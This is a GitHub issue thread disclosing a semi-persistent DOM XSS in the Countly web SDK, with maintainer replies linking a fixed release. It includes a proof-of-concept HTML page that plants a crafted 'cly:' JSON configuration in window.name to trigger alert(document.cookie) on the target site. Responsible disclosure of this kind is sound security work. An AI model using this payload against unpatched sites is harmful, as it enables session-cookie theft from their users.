[Security Issue] Semi-persistent DOM XSS

[charrismatic]

Semi-persistent DOM XSS is possible at in sites that use this library. The DOM XSS can be triggered by passing a malicious JSON string/configuration via window.name to any window.

It is somewhat different from the usual Reflected XSS that you would see. In a normal Reflected XSS, the XSS would likely not work beyond the initial page (i.e. the victim navigated to another page). In this exploit though, the XSS would likely still work.

Note: urls and domains have been changed for security purposes

Steps

1. Go to malicious[.]domain[.]com/xss%201`/window.open%123456.html
2. You will be redirected to target.website.com.
3. Once the page at target.website.com loads, you should see an alert(document.cookie) popup

123456.hml content

<p>1. Click 'Open Window' if you are not redirected automatically</p>
<p>2. Once the new page loads finish, you will seen an alert(document.cookie) XSS</p>
<input type='button' value='open window' onclick='open_window();'>
<script>
	function open_window(){ 
		window.name = "cly:" + '{"app_key":"<redacted>","token":"3","purpose":"heatmap","url":"<redacted>/xss 1"}';
		window.open("target.website.com",'_self');
	}
	open_window();
</script>

This effect persists past page refresh.

I believe the issue originates around here https://github.com/Countly/countly-sdk-web/blob/master/lib/countly.js#L321 https://github.com/Countly/countly-sdk-web/blob/master/lib/countly.js#L344

[turtledreams]

Hi Matt, thank you for bringing this to our attention, we will look into this issue as soon as possible.

[turtledreams]

Hi Matt a fix has been released for this (https://github.com/Countly/countly-sdk-web/releases/tag/22.06.2). Thank you for bringing this up again. Also for the related documentation: https://support.count.ly/hc/en-us/articles/360037441932-Web-analytics-JavaScript-#heatmaps